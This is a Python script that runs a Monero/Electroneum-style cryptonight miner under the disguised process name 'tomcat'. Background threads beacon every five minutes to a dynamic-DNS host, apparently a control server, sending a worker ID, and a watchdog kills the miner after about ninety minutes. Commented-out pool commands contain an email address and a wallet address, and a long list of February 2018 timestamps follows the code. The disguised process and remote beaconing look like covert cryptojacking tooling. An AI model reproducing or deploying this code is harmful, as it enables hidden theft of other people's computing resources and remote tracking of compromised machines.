import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:13:05.285521
#2018-02-17 16:01:01.726859
#2018-02-17 17:48:03.403265
#2018-02-17 19:36:07.075882
#2018-02-17 21:24:06.945998
#2018-02-17 23:08:06.036593
#2018-02-18 00:56:01.998077
#2018-02-18 02:44:01.461289
#2018-02-18 04:33:05.914935
#2018-02-18 06:24:04.097456
#2018-02-18 08:12:06.820056
#2018-02-18 09:58:08.018476
#2018-02-18 11:45:08.052830
#2018-02-18 13:31:01.506915
#2018-02-18 15:21:05.756722
#2018-02-18 17:10:05.033578
#2018-02-18 18:57:06.087236
#2018-02-18 20:44:06.752276
#2018-02-18 22:29:01.415240
#2018-02-19 00:18:06.357830
#2018-02-19 02:04:08.178044
#2018-02-19 03:51:07.479810
#2018-02-19 05:36:01.843183
#2018-02-19 07:23:06.838799
#2018-02-19 09:12:06.490092
#2018-02-19 11:02:07.221388
#2018-02-19 12:50:05.339569
#2018-02-19 14:37:10.414852
#2018-02-19 16:26:09.276314
#2018-02-19 18:12:01.540543
#2018-02-19 19:59:06.775599
#2018-02-19 21:48:04.292867
#2018-02-19 23:36:04.152174
#2018-02-20 01:22:05.671042
#2018-02-20 03:12:06.787716
#2018-02-20 04:59:04.829484
#2018-02-20 06:41:03.892185
#2018-02-20 08:27:06.196567
#2018-02-20 10:12:03.903985
#2018-02-20 11:57:01.584520
#2018-02-20 13:44:01.879408
#2018-02-20 15:32:05.089376
#2018-02-20 17:17:01.482455
#2018-02-20 19:06:01.696960
#2018-02-20 20:54:06.487775
#2018-02-20 22:40:01.759793
#2018-02-21 00:23:05.080251
#2018-02-21 02:08:02.154387
#2018-02-21 03:54:01.592485
#2018-02-21 05:41:07.317771
#2018-02-21 07:31:01.337878
#2018-02-21 09:15:09.136686
#2018-02-21 11:04:01.258841
#2018-02-21 12:50:11.986382
#2018-02-21 14:38:05.989256
#2018-02-21 16:24:12.878763
#2018-02-21 18:14:07.920028
#2018-02-21 20:00:01.466755
#2018-02-21 21:46:08.906368
#2018-02-21 23:34:05.522878
#2018-02-22 01:22:08.072246
#2018-02-22 03:12:07.123665
#2018-02-22 04:58:01.406680
#2018-02-22 06:42:04.310160
#2018-02-22 08:30:06.662067
#2018-02-22 10:17:06.388502
#2018-02-22 12:02:01.804086
#2018-02-22 13:47:08.563646
#2018-02-22 15:34:07.328798
#2018-02-22 17:20:03.835325
#2018-02-22 19:06:06.457837
#2018-02-22 20:58:04.717612
#2018-02-22 22:43:06.688652
#2018-02-23 00:31:07.232011
#2018-02-23 02:17:05.637275
#2018-02-23 04:04:06.400249
#2018-02-23 05:50:04.344854
#2018-02-23 07:40:06.676668
#2018-02-23 09:43:03.643001
#2018-02-23 11:47:01.712601
#2018-02-23 13:36:08.616071
#2018-02-23 15:23:01.723044
#2018-02-23 17:12:08.152273
#2018-02-23 18:57:07.386163
#2018-02-23 20:45:09.738974
#2018-02-23 22:37:03.656494
#2018-02-24 00:23:03.858708
#2018-02-24 02:14:03.922854
#2018-02-24 04:04:08.096224
#2018-02-24 06:41:04.515762
#2018-02-24 08:30:05.006577
#2018-02-24 10:17:05.467606
#2018-02-24 12:12:07.770993
#2018-02-24 13:58:04.770361
#2018-02-24 15:48:03.685022
#2018-02-24 17:41:03.810072
#2018-02-24 19:25:05.958276
#2018-02-24 21:16:05.398056
#2018-02-24 23:53:06.055713
#2018-02-25 03:34:05.096850
#2018-02-25 06:20:08.322444
#2018-02-25 11:34:04.146260
#2018-02-25 13:12:01.741344
#2018-02-25 14:45:01.434859
#2018-02-25 16:18:02.056876